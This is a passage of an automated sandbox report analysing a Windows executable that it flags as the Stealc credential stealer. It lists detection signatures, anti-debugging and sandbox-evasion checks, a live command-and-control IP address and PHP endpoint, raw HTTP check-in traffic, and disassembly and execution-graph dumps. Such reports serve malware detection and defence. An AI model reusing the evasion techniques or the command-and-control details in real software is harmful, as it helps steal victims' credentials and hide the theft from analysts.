                Source: file.exe, 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36324
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36321
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36341
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36376
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36336
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36210
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C4610 VirtualProtect ?,00000004,00000100,000000000_2_004C4610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004D9BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D9AA0 mov eax, dword ptr fs:[00000030h]0_2_004D9AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_004D7690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7280, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_004D9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_004D98E0
                Source: file.exe, file.exe, 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &aProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00507588 cpuid 0_2_00507588
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_004D7D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D7B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_004D7B10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_004D79E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_004D7BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.4c0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1688123808.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7280, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.4c0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1688123808.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7280, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  		unknown
                  http://185.215.113.206/true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/6c4adf523b719729.php=DMJfile.exe, 00000000.00000002.1731343295.000000000130B000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206file.exe, 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.206/6c4adf523b719729.php/Ofile.exe, 00000000.00000002.1731343295.00000000012E7000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206/$file.exe, 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000003.1688123808.0000000004F1B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpfalse
                            • URL Reputation: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.206
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1543430
                            Start date and time:2024-10-27 21:05:10 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 15s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:1
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 133
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.206file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/6c4adf523b719729.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/6c4adf523b719729.php
                            wo4POc0NG1.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                            • 185.215.113.206/6c4adf523b719729.php
                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                            • 185.215.113.206/6c4adf523b719729.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.206/6c4adf523b719729.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/6c4adf523b719729.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/
                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                            • 185.215.113.206/
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/e2b1563c6670f193.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaCBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousLummaCBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206
                            wo4POc0NG1.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                            • 185.215.113.16
                            r9gBM4l6Ip.exeGet hashmaliciousAmadeyBrowse
                            • 185.215.113.43
                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousLummaCBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.961614431109437
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:2'137'600 bytes
                            MD5:7e247ce0bfb04ead4760a9bd841ece58
                            SHA1:41708946a0ab26f707350236bc2f0455e1381cc7
                            SHA256:bcc2e1473d790771507934707e46e5bd0a710141fe776d5b37d14d5aeda8f82a
                            SHA512:29ae8c5166237f74212a53e7b3cc1715f021627ae968f778573287b2ce5c79bc906a26740a1bda1dc4f89a5a2715c375cb6b1a077f0983d7847b1ef9f850c0de
                            SSDEEP:49152:QrJ3AJ2Ce09k45G0s/n63nEstp0yfXwifOepPUdzq:UrTEHr3nE60KwimcUdW
                            TLSH:E1A5330B568045B8D02F8977AC0BCBFA1BDD61EAE06A9F06870DC7469B1FB3F4561583
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                            File Icon

                            Icon Hash:90cececece8e8eb0

                            Static PE Info

                            General

                            Entrypoint:0xb2d000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007FBD38B1DB5Ah
                            haddps xmm4, dqword ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, ch
                            add byte ptr [eax], ah
                            add byte ptr [eax], al
                            add byte ptr [edx+ecx], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add al, 0Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [edx], ecx
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            or dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add al, 0Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            and al, 00h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            and dword ptr [eax], eax
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            push es
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add al, 0Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x2e70000x67600297afaaafbcbc2997a71bd3af66de82dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x2ea0000x2a30000x2007965a81e1cc998daae6eb8ec8d339c45unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            iecwsxsj0x58d0000x19f0000x19ec00ff0549fa3940268c4db0a59eb1b835a5False0.9950547911015672data7.954930403224227IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            qghwgbxt0x72c0000x10000x6009612c378fc3844c42b7093ecddad52b4False0.5930989583333334data5.082642887794335IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x72d0000x30000x2200a5b2b0a546c7be565bd228402746c641False0.05698529411764706DOS executable (COM)0.7326727554108926IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-10-27T21:06:07.833529+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.20680TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Oct 27, 2024 21:06:06.616342068 CET4973080192.168.2.4185.215.113.206
                            Oct 27, 2024 21:06:06.622160912 CET8049730185.215.113.206192.168.2.4
                            Oct 27, 2024 21:06:06.622271061 CET4973080192.168.2.4185.215.113.206
                            Oct 27, 2024 21:06:06.622416973 CET4973080192.168.2.4185.215.113.206
                            Oct 27, 2024 21:06:06.627960920 CET8049730185.215.113.206192.168.2.4
                            Oct 27, 2024 21:06:07.542912960 CET8049730185.215.113.206192.168.2.4
                            Oct 27, 2024 21:06:07.543026924 CET4973080192.168.2.4185.215.113.206
                            Oct 27, 2024 21:06:07.545782089 CET4973080192.168.2.4185.215.113.206
                            Oct 27, 2024 21:06:07.551707983 CET8049730185.215.113.206192.168.2.4
                            Oct 27, 2024 21:06:07.833421946 CET8049730185.215.113.206192.168.2.4
                            Oct 27, 2024 21:06:07.833528996 CET4973080192.168.2.4185.215.113.206
                            Oct 27, 2024 21:06:09.442795038 CET4973080192.168.2.4185.215.113.206

                            HTTP Request Dependency Graph

                            • 185.215.113.206

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.449730185.215.113.206807280C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            Oct 27, 2024 21:06:06.622416973 CET90OUTGET / HTTP/1.1
                            Host: 185.215.113.206
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Oct 27, 2024 21:06:07.542912960 CET203INHTTP/1.1 200 OK
                            Date: Sun, 27 Oct 2024 20:06:07 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Oct 27, 2024 21:06:07.545782089 CET413OUTPOST /6c4adf523b719729.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----IDBKFHJEBAAEBGDGDBFB
                            Host: 185.215.113.206
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 33 44 45 30 38 32 46 36 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 2d 2d 0d 0a
                            Data Ascii: ------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="hwid"493DE082F6451388941053------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="build"tale------IDBKFHJEBAAEBGDGDBFB--
                            Oct 27, 2024 21:06:07.833421946 CET210INHTTP/1.1 200 OK
                            Date: Sun, 27 Oct 2024 20:06:07 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:0
                            Start time:16:06:02
                            Start date:27/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x4c0000
                            File size:2'137'600 bytes
                            MD5 hash:7E247CE0BFB04EAD4760A9BD841ECE58
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1688123808.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:3%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:2.9%
                              Total number of Nodes:1327
                              Total number of Limit Nodes:24
                              execution_graph 36167 4d6c90 36212 4c22a0 36167->36212 36191 4d6d04 36192 4dacc0 4 API calls 36191->36192 36193 4d6d0b 36192->36193 36194 4dacc0 4 API calls 36193->36194 36195 4d6d12 36194->36195 36196 4dacc0 4 API calls 36195->36196 36197 4d6d19 36196->36197 36198 4dacc0 4 API calls 36197->36198 36199 4d6d20 36198->36199 36364 4dabb0 36199->36364 36201 4d6dac 36368 4d6bc0 GetSystemTime 36201->36368 36203 4d6d29 36203->36201 36205 4d6d62 OpenEventA 36203->36205 36207 4d6d79 36205->36207 36208 4d6d95 CloseHandle Sleep 36205->36208 36211 4d6d81 CreateEventA 36207->36211 36209 4d6daa 36208->36209 36209->36203 36210 4d6db6 CloseHandle ExitProcess 36211->36201 36565 4c4610 36212->36565 36214 4c22b4 36215 4c4610 2 API calls 36214->36215 36216 4c22cd 36215->36216 36217 4c4610 2 API calls 36216->36217 36218 4c22e6 36217->36218 36219 4c4610 2 API calls 36218->36219 36220 4c22ff 36219->36220 36221 4c4610 2 API calls 36220->36221 36222 4c2318 36221->36222 36223 4c4610 2 API calls 36222->36223 36224 4c2331 36223->36224 36225 4c4610 2 API calls 36224->36225 36226 4c234a 36225->36226 36227 4c4610 2 API calls 36226->36227 36228 4c2363 36227->36228 36229 4c4610 2 API calls 36228->36229 36230 4c237c 36229->36230 36231 4c4610 2 API calls 36230->36231 36232 4c2395 36231->36232 36233 4c4610 2 API calls 36232->36233 36234 4c23ae 36233->36234 36235 4c4610 2 API calls 36234->36235 36236 4c23c7 36235->36236 36237 4c4610 2 API calls 36236->36237 36238 4c23e0 36237->36238 36239 4c4610 2 API calls 36238->36239 36240 4c23f9 36239->36240 36241 4c4610 2 API calls 36240->36241 36242 4c2412 36241->36242 